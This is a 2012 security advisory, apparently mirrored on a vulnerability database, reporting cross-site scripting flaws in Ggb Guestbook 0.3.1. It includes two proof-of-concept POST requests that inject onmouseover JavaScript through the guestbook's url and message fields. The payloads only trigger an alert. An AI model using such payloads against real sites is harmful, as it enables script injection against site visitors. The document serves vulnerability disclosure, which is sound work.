Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27528
HistoryJan 09, 2012 - 12:00 a.m.

Ggb Guestbook - XSS Vulnerabilities

2012-01-0900:00:00
vulners.com
24

Title: Ggb Guestbook - XSS Vulnerabilities

Software : Ggb Guestbook

Software Version : 0.3.1

Vendor: http://gelin.ru/soft/project/ggb/
http://code.google.com/p/ggbook/

Vulnerability Published : 2012-01-05

Vulnerability Update Time :

Status :

Impact : Medium

Bug Description :
Ggb Guestbook(version update : 0.3.1) is vulnerable to XSS.

Proof Of Concept :
1)url in action/add-submit.php , PoC:
POST http://127.0.0.1/ggb/?action=add-submit

name=demonalex&email=&url=%22+onmouseover%3D%22javascript%3Aalert%28%27demonalex%27%29%3B%22%3E&message=demonalex

2)message in action/add-submit.php , PoC:
POST http://192.168.10.211/ggb/?action=add-submit

name=aaa&email=&url=bbb&message=%3Cimg+src%3D%22aaa.jpg%22+onmouseover%3D%22javascript%3Aalert%28%27demonalex%27%29%3B%22%3E

Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / [email protected]
Pentester/Researcher
Dark2S Security Team/PolyU.HK